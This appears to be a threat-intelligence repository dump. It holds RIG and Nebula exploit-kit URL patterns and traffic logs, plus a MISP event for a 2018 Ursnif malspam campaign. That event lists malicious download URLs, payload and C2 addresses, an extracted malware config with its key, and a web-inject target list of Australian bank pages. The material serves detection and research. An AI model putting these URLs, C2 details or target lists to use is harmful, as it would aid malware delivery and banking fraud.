12 | 2017/06/12 13:20:16;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Travel&sessid=xfF5fOFZPAG3jEbVKgVnyN9cUVlGoa-mj0ndzkWa1JSF-RDeMwlNq6KlJLV_mhj2&param=w3bQMvXcJxjQFYbGMvzDSKNbNk_WHViPxoyG9MildZyqZGX_k7TDfF-qoVTcCgWR&Sport=3755
13 | 2017/06/12 13:20:16;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Money&param=wXzQMvXcJwDQCobGMvrESLtMNknQA0KK2Iz2_dqyEoH9cmnihNzUSkrw6B2aC&sessid=m2F8PQqK7dXbgS3jUyDKAUznohYUwgbpK342EPUzELJ1J-D_BSKUTp1u9CXUbI&Health=4058
14 | 2017/06/12 13:25:17;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Video&sessid=hofYpKrRVOlDmjxOJeFZhzo1fVFtB__qpiheDyBPIgMLW9RSMZg91z6LRVvQy2w&param=wHzQMvXcJwDGFYbGMvrET6NbNknQA0GPxpH2_drZdZqxKGni0-b5UUSk6FWCEh3&Money=4386
15 | 2017/06/12 13:25:17;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Regions&param=znbQMvXcJwDQDorGMvrESLtEMU3QA0KK2OH_76qyEoH9JHT1vrTUSkrttgWC&sessid=eliDofV4JLVSOgbl20aBLVFnnIcLUA5Fo_-qhkLWzx_OhJaG_RW9UToBvdeW&Regions=4300
16 | 2017/06/12 13:30:19;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Money&sessid=h9_UlK-FUNVK3hUKEKAY1nY0MB11G9PimjkfTnB_Og8OL-hyMZgt1z6LRVvQ52w&param=wHfQMvXcJwDJFYbGMvrESKNbNknQA06PxpH2_drTdZqxKGni1Ob5UUSk6F6CEh3&Travel=4874
17 | 2017/06/12 13:30:20;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Money&param=znnQMvXcJwDQDoLGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrTUSkrttgWC&sessid=elmHp6IpKLJWNQbijxCHKVE0n4pYUghA8qiviUaDyBabhZOG_B29UToBvdeW&Sport=4474
18 | ```
19 | 
20 | 2017-03-12 - Pattern switch
21 | ```
22 | 2017/03/12 18:15:20;rty.taffconstruction.com;80;5.200.53.22;48096;OOO IT-Grad;/?q=w37QMvXcJxnQFYbGMv3DSKNbNkfWHViPxouG9MildZeqZGX_k7fDfF-qoV7cCgWR&oq=xfAqKbIFbgvijkaDcwcwmthZUlsV9qiqhkKHzkSV1peFq0GLaQ4Q9qKlJLV_mhj2
23 | 2017/03/12 18:20:18;rty.taffconstruction.com;80;5.200.53.22;48096;OOO IT-Grad;/?oq=CelvQ_PV7L7RQPQvk30GFLwI0ztsLUl0R8quqh0LUyxDK1p6G-yW9UU4HupE&ct=border&que=border.118ut66.406p9g2a8&fix=border.118hb57.406p5u4c9&q=z3_QMvXcJwDQDoTDMvrESLtEMU_OG0KK2OH_783VCZf9JHT1vvHPRAPwtgW&biw=border.85fk114.406f7e9f8
24 | ```
25 | More example :
26 | http://pastebin.com/raw/LPTJAMYp
27 | 
28 | 2017-02-25 - Pattern switch
29 | ```
30 | 2017/02/25 18:50:37;1top.cpamarketingmedia.com;80;92.53.97.144;9123;TimeWeb Ltd.;/?oq=xfUpLLJVOgqyjUKIfgVjz4sPVFMVov-riEfVnESc0p6E_kbcNw9G-qKlJLd_mhj2&q=w3jQMvXcJxzQFYbGMv7DSKNbNknWHViPxoyG9MildZqqZGX_k7PDfF-qoV3cCgWR&word=mutilate&biw=blouse.96rg88.406a4p3i8&ct=blouse
31 | 2017/02/25 19:50:16;new.hjx4yz.xyz;80;92.53.127.252;9123;TimeWeb Ltd.;/?oq=elmD9_stKLQFOgGy3ECGKQdkz4ZfBFMToaH4hkbQnEXJ0sKFqRG9UToBvdeW&q=zn3QMvXcJwDQDoLGMvrESLtEMUbQA0KK2OH_76qyEoH9JHT1vrPUSkrttgWC
32 | ```
33 | 2017-02-24 - Pattern switch
34 | ```
35 | 2017/02/24 22:30:17;acc.dentalko.com;80;217.107.34.243;8342;JSC RTComm.RU;/?br_fl=4169&oq=h9KcsKLYGOADphBSBeVRjz4haVVlG8Kim30CBzRHIhJ-L9ByNNw11z6LRVvQ42w&tuif=5562&biw=educate.75bg110.406h2k9a1&q=wHbQMvXcJwDPFYbGMvrER6NbNknQA06PxpH2_drXdZqxKGni2eb5UUSk6F-CEh3&word=hawker&yus=educate.79ek73.406c3x9p0&ct=educate
36 | 2017/02/24 22:35:21;acc.dentalko.com;80;217.107.34.243;8342;JSC RTComm.RU;/?biw=throw.76wu58.406o1e8l8&q=wHfQMvXcJwDHFYbGMvrETqNbNknQA0-PxpH2_drTdZqxKGni1-b5UUSk6FWCEh3&oq=hofssfLEBOgbijxGBKVFgyYteAV4Q9_-ri0DRzx-YgMaL-RfeNQ51z6LRVvQy2w&word=approachable&ct=throw
37 | 2017/02/24 22:40:17;acc.dentalko.com;80;217.107.34.243;8342;JSC RTComm.RU;/?word=approachable&biw=educate.89oa115.406r5v7k2&q=wXbQMvXcJwDQC4bGMvrESLtDNknQA0KK2In2_dqyEoH9e2nihNzUSkry6B2aC&ct=educate&oq=m2D9PQpKLFZPgriiBHRLQc0lY9aVA5Bov-p20jQyB7Ig5PW-BfcUTp1u9CdUbI
38 | ```
39 | 
40 | *October 2016*
41 | - 2016-10-24 - RIG-v Pattern
42 | - 2016-11-01 - RIG standard is now using same pattern (Old pattern only in Empire Pack)
43 | 
44 | ### __Landing__
45 | ```
46 | /?es_sm=136&aqs=chrome.101a90.406k1t8&oq=m2D8_d4KrADOQq0j0fVe1AwnIpYUwhC8Piui0SGzBCfiZTU9R3bUTp1u9CTUbI&ie=UTF-16&sourceid=chrome&q=wX_QMvXcJwDQDYbGMvrESLtGNknQA0KK2I32_dqyEoH9cmnihNzUSkr36B2aC
47 | /?es_sm=100&oq=m3RpvEoJLRTaFDhiBSFe1Yyn4xUWg8SpK6ti0LRwR-a1JCK9B2OUTp1u9CdUbI&ie=UTF-16&aqs=yandex.123z92.406c2l0&sourceid=yandex&q=wXjQMvXcJwDQC4bGMvrESLtHNknQA0KK2I32_dqyEoH9fWnihNzUSkr36B2aC
48 | /?sourceid=msie&q=wX_QMvXcJwDQCYbGMvrESLtENknQA0KK2Ir2_dqyEoH9e2nihNzUSkry6B2aC&oq=m3ZpvIuKrUFaQOyhEHRLQAwyIpcW1wQ8Pyv3UHWy0PPh5OF_haLUTp1u9CRUbI&ie=UTF-8&aqs=msie.74l104.406o3j2&es_sm=99
49 | /?es_sm=121&sourceid=mozilla&ie=Windows-1251&q=w3bQMvXcJxzQFYbGMvnDSKNbNk3WHViPxoqG9MildZuqZGX_k7rDfF-qoV7cCgWR&aqs=mozilla.120h78.406e3c3&oq=xfZ5KecCbAS0j0PTfQQwn4dcAVlA8Kyp2EHVyUWcgp-L9BSFaQIUraKlJLJ_mhj2
50 | /?sourceid=edge&oq=CelnX8PF5LecEPVK33xfTKAwwnYlcBA5G9KqqiROGwESV1cPR_SW9UU4HupE&aqs=edge.103f77.406p1q2&es_sm=97&q=z3nQMvXcJwDQDoTGMvrESLtEMU_OG0KK2OH_783VCZr9JHT1vvHPRAPytgW&ie=UTF-16
51 | /?sourceid=yandex&ie=UTF-16&q=z3fQMvXcJwDQDoTJMvrESLtEMU_OHkKK2OH_783VCZf9JHT1vvHPRAP6tgW&aqs=yandex.129i102.406e3y9&es_sm=92&oq=CegmC_PEoLLBWaQPm3EeAegE1yIZaWlMb96ymjxfXyx-dgsOC-CW9UU4HupE
52 | /?q=wXjQMvXcJwDQCobGMvrESLtCNknQA0KK2I32_dqyEoH9fGnihNzUSkr06B2aC&ie=UTF-8&oq=m2A8_olLLQCblXoi0aELVcyn9tbBg5B8PupiEiByUPJ1caL-BPfUTp1u9CUUbI&aqs=yandex.114w75.406f1v2&sourceid=yandex&es_sm=117
53 | /?q=z3nQMvXcJwDQDoTAMvrESLtEMU_OFUKK2OH_783VCZ39JHT1vvHPRAP0tgW&oq=CelTS9vEsKbdYbAOz2UOHeQ0zyNtcBw4VoaGqjEPTwR7O1J6B9SW9UU4HupE&aqs=edge.122c70.406o4u7&sourceid=edge&es_sm=98&ie=Windows-1251
54 | ```
55 | ----
56 | ### __Flash__ 
57 | ```
58 | /?oq=D86YqL-FUNAu0jxCALlRhmItcAAsUpqmr3UnQzxWVg8GKqxy9Zg9C-5elV7R8jg&ie=Windows-1251&q=zn7QMvXcJwDQDoXGMvrESLtEMUnQA0KK2OH_76yyEoH9JHT1vrXUSkrttgWCelq&sourceid=edge&aqs=edge.106w109.406c6t8&es_sm=126
59 | /?es_sm=109&ie=Windows-1252&sourceid=mozilla&q=w37QMvXcJx_QFYbGMv3DSKNbNk7WHViPxoeG9MildZmqZGX_k7vDfF-qoVXcCgWRxfs&aqs=mozilla.70j116.406y4v8&oq=tfrdZOwTi2BaAKgBknN0OUVMR__yv3UDSyhOYiJGL-0GKaQxN_KKdELU821rFjLVTJg
60 | /?ie=UTF-16&aqs=yandex.101x67.406q9z1&es_sm=116&sourceid=yandex&q=znnQMvXcJwDQDorGMvrESLtEMUnQA0KK2OH_76uyEoH9JHT1vrHUSkrttgWCelv&oq=ZpvAqKucEPQGyiRTWflQ1mI1UVFkUoqj9jUPXnEWbhJCB-xa9aQ5E_ZClV7Z8jg
61 | /?aqs=edge.128u86.406j0s9&q=znbQMvXcJwDQDoPGMvrESLtEMU3QA0KK2OH_76qyEoH9JHT1vrXUSkrttgWCelS&oq=F8aZ_fOdSOwuyixSDcgQyz41aV11F96n9jkHXwB-diJ_Trxa9ZQJM9pClV7d8jg&sourceid=edge&ie=Windows-1251&es_sm=101
62 | /?q=z3bQMvXcJwDQDoTHMvrESLtEMU_OFUKK2OH_783VCZv9JHT1vvHPRAP0tgWCel&oq=nX8PF5K-cEPVK33xfTKAAwnYlcBA5G9KquiROGwESV1cPR_CWMaQNG_aLWU7lt&es_sm=106&ie=Windows-1252&sourceid=msie&aqs=msie.115o77.406z2i5
63 | /?oq=FpvIkL7dSO1fhhULReQVgyNpVWl0b_qGui0TUnxSeiZaA_EGNUQJD9pCdFYF4nws&sourceid=edge&ie=UTF-16&q=wX7QMvXcJwDQDIbGMvrESLtMNknQA0KK2I32_dqyEoH9fWnihNzUSkr26B2aCm2&es_sm=108&aqs=edge.91x97.406x6w5
64 | /?oq=A8_slLLQCblXoikaELVcyn9taBg5B8PupiEKByUPJ1caL_hPfUQlD_ZuUFIF4nws&q=wXrQMvXcJwDQAobGMvrESLtDNknQA0KK2Ir2_dqyEoH9f2nihNzUSkr16B2aCm2&ie=UTF-16&aqs=chrome.124m87.406q2m1&es_sm=128&sourceid=chrome
65 | /?oq=PAtLrBROAuwiUXSLwNmnokPBg8Sov2uiBfdyxSaiZ-Kr0GEYgJ195GVHbA66B6ymQ&sourceid=mozilla&es_sm=143&aqs=mozilla.109l110.406g1n6&q=wHnQMvXcJwDOFYbGMvrERqNbNknQA0aPxpH2_drXdZqxKGni1-b5UUSk6FmCEh3h_&ie=Windows-1251
66 | ```
67 | ----
68 | ### __Payload__
69 | ```
70 | /?aqs=yandex.118x103.406x5x6&oq=_XoPQvJOFUNFbj2EXVKgVhmI8PA11C96yo3UTTyh-f1p_U_iWKZwtE-qLIVLg4&ie=Windows-1252&q=z3_QMvXcJwDQDoTGMvrESLtEMU_OFEKK2OH_783VCZ79JHT1vvHPRAPytgWCeg&es_sm=106&sourceid=yandex
71 | /?es_sm=122&aqs=yandex.72h87.406n5e4&ie=Windows-1252&sourceid=yandex&oq=fMlfrFXOgK02UXTfwEwyosMBlsX_q-tiUeAyEWfgpDXrhKJZgJG-aKcHbUy6AC1zA&q=w3zQMvXcJxzQFYbGMvvDSKNbNkbWHViPxoiG9MildZ6qZGX_k7rDfF-qoVncCgWRx
72 | /?oq=fp5KecCbAG0j0PTfQUwn4dcAVhA8Kyp2EHVyUWcgpGL9BSFaQ4UraKcHbky6AC1zA&ie=Windows-1252&es_sm=114&sourceid=edge&aqs=edge.127l117.406d1y7&q=w3_QMvXcJxbQFYbGMv_DSKNbNkjWHViPxoyG9MildZuqZGX_k7PDfF-qoV3cCgWRx
73 | /?q=z3bQMvXcJwDQDoTAMvrESLtEMU_OHkKK2OH_783VCZr9JHT1vvHPRAPxtgWCel&sourceid=mozilla&ie=Windows-1251&oq=nX8PF5L-cEPVK33xfTKAAwnYlcBA5G9KqpiROGwESV1cPR9CWOaQ9A_qLIVLM4&es_sm=113&aqs=mozilla.69p58.406e7h9
74 | /?ie=UTF-16&sourceid=edge&es_sm=111&oq=2FpvskL7dSO1fhj0LReQVgyNpZWl0b_qGui0PUnxSeiZaA-kGNUQNM9qKRSfE4&q=wXrQMvXcJwDQCYbGMvrESLtBNknQA0KK2Ij2_dqyEoH9eGnihNzUSkr76B2aCm&aqs=edge.129s85.406y3j6
75 | /?es_sm=106&oq=8K7pROwGz3hOJeARlytwOUV9Go_38iUeHzhDIgJPXqEDcaAxDraKcHLQ72FrFkrJUcw&aqs=yandex.113u116.406m3h2&ie=Windows-1252&q=w3nQMvXcJxnQFYbGMvLDSKNbNkbWHViPxoyG9MildZ6qZGX_k7bDfF-qoVTcCgWRxfB&sourceid=yandex
76 | /?es_sm=141&sourceid=edge&oq=kLrFSPADkhRSAKQ01molfAFhHoqj72kHTnx6egpOE9R3fNQtM_KKQELE52lrFkrZUcw&ie=UTF-8&q=w3bQMvXcJxbQFYbGMvjDSKNbNk3WHViPxouG9MildZ2qZGX_k7bDfF-qoVrcCgWRxfc&aqs=edge.84f92.406s6k7
77 | ```
78 | ----
79 | 


--------------------------------------------------------------------------------
/IOCs/misp.event.2443.5a79b8fc-4460-4a3a-a6e6-2232c0a8a8de.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <response>
 3 | <Event><id>2443</id><orgc_id>1</orgc_id><org_id>1</org_id><date>2018-02-06</date><threat_level_id>1</threat_level_id><info>Malspam_5449_180206</info><published>1</published><uuid>5a79b8fc-4460-4a3a-a6e6-2232c0a8a8de</uuid><analysis>2</analysis><timestamp>1517928328</timestamp><distribution>2</distribution><publish_timestamp>1517929010</publish_timestamp><sharing_group_id>0</sharing_group_id><disable_correlation>0</disable_correlation><event_creator_email>kafeine@dontneedcoffee.com</event_creator_email><Org><id>1</id><name>DNC</name><uuid>5749cdb1-1e74-450f-8baf-3ba5c0a8a8de</uuid></Org><Orgc><id>1</id><name>DNC</name><uuid>5749cdb1-1e74-450f-8baf-3ba5c0a8a8de</uuid></Orgc><Attribute><id>50048</id><type>url</type><category>Network activity</category><to_ids>1</to_ids><uuid>5a79b98a-6d2c-43f7-bd27-02f7c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517926794</timestamp><comment>JavaScript Payload (Ursnif)</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>http://91.121.68.80/images/contact.png</value><ShadowAttribute/></Attribute><Attribute><id>50049</id><type>url</type><category>Network activity</category><to_ids>1</to_ids><uuid>5a79b98a-c718-4445-90db-02f7c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517926794</timestamp><comment>JavaScript Payload (Ursnif)</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>http://94.23.15.45/images/contact.png</value><ShadowAttribute/></Attribute><Attribute><id>50050</id><type>ip-dst</type><category>Network activity</category><to_ids>1</to_ids><uuid>5a79b9b2-5bc8-4f8a-b8d7-2352c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517926834</timestamp><comment>Binary Server hosting Gozi Payload (JS payload)</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>91.121.68.80</value><ShadowAttribute/></Attribute><Attribute><id>50051</id><type>ip-dst</type><category>Network activity</category><to_ids>1</to_ids><uuid>5a79b9b2-7f28-4cc3-b090-2352c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517926834</timestamp><comment>Binary Server hosting Gozi Payload (JS payload)</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>94.23.15.45</value><ShadowAttribute/></Attribute><Attribute><id>50052</id><type>url</type><category>Network activity</category><to_ids>1</to_ids><uuid>5a79ba1e-20d4-45f4-b15b-02f7c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517926942</timestamp><comment>Link to Zipped JS</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>http://mtfaustralia.com.au/renewal/Notification_1-QEM7S3P.zip</value><ShadowAttribute/></Attribute><Attribute><id>50053</id><type>url</type><category>Network activity</category><to_ids>1</to_ids><uuid>5a79ba1e-f1c4-4f33-8c7c-02f7c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517926942</timestamp><comment>Link to Zipped JS</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>http://fastbusinesscards.net.au/renewal/Notification_1-QEM7S3P.zip</value><ShadowAttribute/></Attribute><Attribute><id>50054</id><type>url</type><category>Network activity</category><to_ids>1</to_ids><uuid>5a79ba1e-3d08-4ce7-b3b3-02f7c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517926942</timestamp><comment>Link to Zipped JS</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>https://thesysad.com/wp-content/uploads/2018/01/Invoice%20INV-0782.zip</value><ShadowAttribute/></Attribute><Attribute><id>50055</id><type>md5</type><category>Payload delivery</category><to_ids>1</to_ids><uuid>5a79bc60-4780-40ec-a6e8-2232c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517927520</timestamp><comment>Ursnif</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>7610794b808281e2cc1dae26895fe102</value><ShadowAttribute/></Attribute><Attribute><id>50056</id><type>sha1</type><category>Payload delivery</category><to_ids>1</to_ids><uuid>5a79bc60-dba4-4654-ae08-2232c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517927520</timestamp><comment>Ursnif</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>219415e1c6395d65224356cb8dd7b9b6bdf15f6b</value><ShadowAttribute/></Attribute><Attribute><id>50057</id><type>sha256</type><category>Payload delivery</category><to_ids>1</to_ids><uuid>5a79bc60-2a58-4dbc-88fe-2232c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517927520</timestamp><comment>Ursnif</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>06d4d572d22cad23b4bfbcfb043372aaaad71451b65093bb8d451f34349bb69b</value><ShadowAttribute/></Attribute><Attribute><id>50058</id><type>pattern-in-memory</type><category>Payload installation</category><to_ids>0</to_ids><uuid>5a79bc9c-02b0-4830-b99b-2233c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517927580</timestamp><comment>Injects (source Francine)</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>https://banking?.anz.com/IBAU/BANKAWAY*jsessionid*
 4 | https://banking?.anz.com/IBAU/web/L001/script/common.js
 5 | https://banking?.anz.com/*/bootstrap/jquery-*.min.js
 6 | https://banking?.anz.com/IBAU/web/L001/script/menu/jquery-1.3.2.min.js
 7 | https://static.my.commbank.com.au/static/core/js/core-merge.*.js
 8 | https://www?.my.commbank.com.au/netbank/PaymentHub/PaymentReceipt.aspx?RID=*
 9 | https://www?.my.commbiz.commbank.com.au?
10 | https://www?.my.commbiz.commbank.com.au/client/*.aspx*
11 | https://www?.my.commbiz.commbank.com.au/online/*.aspx*
12 | https://www?.my.commbiz.commbank.com.au/Accounts/*.aspx*
13 | https://www?.my.commbiz.commbank.com.au/Fintran/*.aspx*
14 | https://www?.my.commbiz.commbank.com.au/static/core/js/core-merge.*.js*
15 | https://www?.my.commbiz.commbank.com.au/Common/Common.Web/javascript/Cbiz/baseLib.js*
16 | https://www?.my.commbiz.commbank.com.au/Common/Common.Web/javascript/func.js*
17 | https://ib.nab.com.au/nabib/index.jsp*
18 | https://ib.nab.com.au/nabib/*.ctl*
19 | https://ib.nab.com.au/nabib/scripts/jquery/jquery*.js*
20 | https://talent.seek.com.au/Home/Welcom*
21 | https://talent.seek.com.au/Job/Index/*
22 | https://advertisers.careerone.com.au/login.asp*
23 | https://www.adzuna.com.a*
24 | https://ibanking.*.au/InternetBankingResources/ibank2/javascript/util/jquery-1.7.1.min.js
25 | https://ibanking.*.com.au/InternetBankingResources/ibank2/javascript/util/utils.js
26 | https://ibanking.stgeorge.com.au/ibank/*
27 | https://ibanking.banksa.com.au/ibank/*
28 | https://ibanking.bankofmelbourne.com.au/ibank/*
29 | https://bbo.*.com.au/dist/Release/packaging/payments2.js
30 | https://internetbanking.suncorpbank.com.au/StaticContent/CombineJs*
31 | https://internetbanking.suncorpbank.com.au/*/*
32 | https://banking.westpac.com.au/*/banking/Scripts/Desktop/Core/SkipAutoRegistration/modernizr.js*
33 | https://banking.westpac.com.au/secure/banking/overview/payments/confirmation*IsNewPayee=true
34 | https://banking.westpac.com.au/*/payeelist*
35 | https://banking.westpac.com.au/*/paymentlist*
36 | https://banking.westpac.com.au/*/paymentreceipt*
37 | https://banking.westpac.com.au/*/Pay/To.aspx
38 | https://banking.westpac.com.au/*/bpd_pmnmodify.asp*
39 | https://banking.westpac.com.au/*/bpd_pmpendinglist.asp*
40 | https://banking.westpac.com.au/*/bsd_aiestmtlist.asp*
41 | https://www.anz.com/INETBANK/*
42 | https://*.commbank.com.au/netbank/*
43 | https://*commbiz.commbank.com.au/*
44 | https://ib.nab.com.au/*
45 | https://ibanking.*.au/ibank/*
46 | https://bbo.stgeorge.com.au/*
47 | https://internetbanking.suncorpbank.com.au/*
48 | https://online.westpac.com.au/*
49 | https://bbonline.banksa.com.au/html/cbank.asp*
50 | https://bbonline.stgeorge.com.au/html/cbank.asp*
51 | https://bbonline.bankofmelbourne.com.au/html/cbank.asp*
52 | https://ibs.bankwest.com.au/BWLogin/bib.aspx*</value><ShadowAttribute/></Attribute><Attribute><id>50059</id><type>md5</type><category>Payload delivery</category><to_ids>1</to_ids><uuid>5a79bd52-1f74-40b8-893f-2232c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517927762</timestamp><comment>Notification_1-QEM7S3P.js (Js in the Zip)</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>2f7f7b35aa9ff638362b7f45a63a9431</value><ShadowAttribute/></Attribute><Attribute><id>50060</id><type>sha1</type><category>Payload delivery</category><to_ids>1</to_ids><uuid>5a79bd52-0ad0-4353-863b-2232c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517927762</timestamp><comment>Notification_1-QEM7S3P.js (Js in the Zip)</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>a16fbe56f9b8a285b60903a6719303156c7d359e</value><ShadowAttribute/></Attribute><Attribute><id>50061</id><type>sha256</type><category>Payload delivery</category><to_ids>1</to_ids><uuid>5a79bd52-ffb8-4296-a934-2232c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517927762</timestamp><comment>Notification_1-QEM7S3P.js (Js in the Zip)</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>9ea2ca045970ddd7dc5ebe5ed159d5f80b4a9fb65919aaa411d32712f9d832f8</value><ShadowAttribute/></Attribute><Attribute><id>50062</id><type>pattern-in-memory</type><category>Payload installation</category><to_ids>0</to_ids><uuid>5a79bdf9-e574-472a-81cd-2235c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517927929</timestamp><comment>Ursnif Config</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>id: 1290118
53 | version: 3.0.547
54 | soft: 2
55 | key: UGMo0Mj5U83xyrN3
56 | c2: https://185.24.232.164
57 | uri: index.html</value><ShadowAttribute/></Attribute><Attribute><id>50063</id><type>ip-dst</type><category>Network activity</category><to_ids>1</to_ids><uuid>5a79bf88-4964-45b7-90f7-2234c0a8a8de</uuid><event_id>2443</event_id><distribution>5</distribution><timestamp>1517928328</timestamp><comment>Ursnif C2</comment><sharing_group_id>0</sharing_group_id><deleted>0</deleted><disable_correlation>0</disable_correlation><object_id>0</object_id><object_relation/><value>185.24.232.164</value><ShadowAttribute/></Attribute><Object/><ShadowAttribute/><RelatedEvent><Event><id>2438</id><date>2018-02-06</date><threat_level_id>1</threat_level_id><info>Notes_Sagrid</info><published>0</published><uuid>5a799b8b-38f4-49c4-baba-2235c0a8a8de</uuid><analysis>0</analysis><timestamp>1517919793</timestamp><distribution>2</distribution><org_id>1</org_id><orgc_id>1</orgc_id><Org><id>1</id><name>DNC</name><uuid>5749cdb1-1e74-450f-8baf-3ba5c0a8a8de</uuid></Org><Orgc><id>1</id><name>DNC</name><uuid>5749cdb1-1e74-450f-8baf-3ba5c0a8a8de</uuid></Orgc></Event></RelatedEvent><Tag><id>205</id><name>dnc:driveby-type=&quot;Malspam&quot;</name><colour>#000000</colour><exportable>1</exportable><hide_tag>0</hide_tag></Tag><Tag><id>477</id><name>dnc:malspam-type=&quot;url-to-zipped-js&quot;</name><colour>#390658</colour><exportable>1</exportable><hide_tag>0</hide_tag></Tag><Tag><id>636</id><name>dnc:attrib-int=&quot;170007&quot;</name><colour>#5e5e5e</colour><exportable>1</exportable><hide_tag>0</hide_tag></Tag><Tag><id>637</id><name>dnc:attrib=&quot;Sagrid&quot;</name><colour>#5e5e5e</colour><exportable>1</exportable><hide_tag>0</hide_tag></Tag><Tag><id>102</id><name>dnc:country=&quot;AUS&quot;</name><colour>#002776</colour><exportable>1</exportable><hide_tag>0</hide_tag></Tag><Tag><id>111</id><name>dnc:malware=&quot;Dreambot/ISFB&quot;</name><colour>#4bc7cf</colour><exportable>1</exportable><hide_tag>0</hide_tag></Tag><Tag><id>1623</id><name>dnc:dreambot-key=&quot;UGMo0Mj5U83xyrN3&quot;</name><colour>#84c4cf</colour><exportable>1</exportable><hide_tag>0</hide_tag></Tag></Event></response>
58 | 


--------------------------------------------------------------------------------
/Nebula_URI:
--------------------------------------------------------------------------------
  1 | 2017-03-02
  2 | /.DS_Store/Browse_Item_Details.php?Store_Id=3317344389062795235
  3 | /0011/bcd0dd432911b49/505380686840319/index.php?showtopic=36353
  4 | /00350d8351d408496a52b9bf11335a1c025ebc77/index.php?route=product/category
  5 | /020f00cf/unix/OOclZYj5me/showthread.php?t=45213&page=19
  6 | /021b00d6/642478784050396/KlqO9zIFhP/index.php?route=product/category&path=8815_845
  7 | /056ed9e18baa8df3fd735c7da37a8ebeaf5729e76a838d5971d6e2fc5ba642b9/viewtopic.php?f=89&t=60755
  8 | /0ddba54accd8d7bae9c6dfa543ee00ed/showpost.php?s=6f4fcf4984a408f3b311f4494b3f4d03&p=5&postcount=4
  9 | /0snbVH8bNi/16707269976141736944/winners.php?lizard=QxtZH1vRdN
 10 | /1102f1d5949aa31/structure/project/index.php?route=product/category&path=3483
 11 | /1624136953656830795/6873246418762343954/events/event.php?id=drive
 12 | /172295202597447518/19183195869291414252/zones.php?helium=pr471ltR7E
 13 | /17755713935315381471/viewtopic.php?f=56&t=28398
 14 | /1901f313/1068e8351903ebc017db1ba470dfccb58aeb8541f89d2456/showpost.php?s=f88b99cf924270ddeea862344e16e9ce&p=11&postcount=5
 15 | /2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14
 16 | /2001/12/29/date-of-birth-admit-anthony
 17 | /2002/08/18/outputpaste-grandfather-family-name
 18 | /2002/10/10/deliverydepartment-description-establish
 19 | /2002/11/02/wound-juice-educational-background
 20 | /2003/01/24/agenda-step-son-disadvantage
 21 | /2003/01/27/exchange-monday-wilderness
 22 | /2003/04/31/select-occupation-joinlend
 23 | /2003/12/07/deficit-creditor-copy
 24 | /2004/07/05/engineer-purchase-schedule
 25 | /2005/02/03/snail-finger-alloy
 26 | /2005/08/08/shoemaker-carpenterchauffeur-gray
 27 | /2005/09/02/napkin-telephone-number-payment
 28 | /2006/02/17/shoemaker-digital-couch
 29 | /2006/02/19/interviewer-derp-bracket
 30 | /2006/08/05/fur-copper-shark
 31 | /2006/09/27/separated-ellipse-ton
 32 | /2007/09/30/charge-encourage-cooking
 33 | /2007/11/06/bankbook-harbor-map
 34 | /2008/07/24/outputpaste-shorten-pig
 35 | /2009/02/27/multimedia-carol-unlike
 36 | /2009/02/28/nurse-provide-digital
 37 | /2009/11/29/advice-success-dismiss
 38 | /2010/06/06/bear-fire-fighterfisherman-organize
 39 | /2010/12/31/industry-repairs-inform
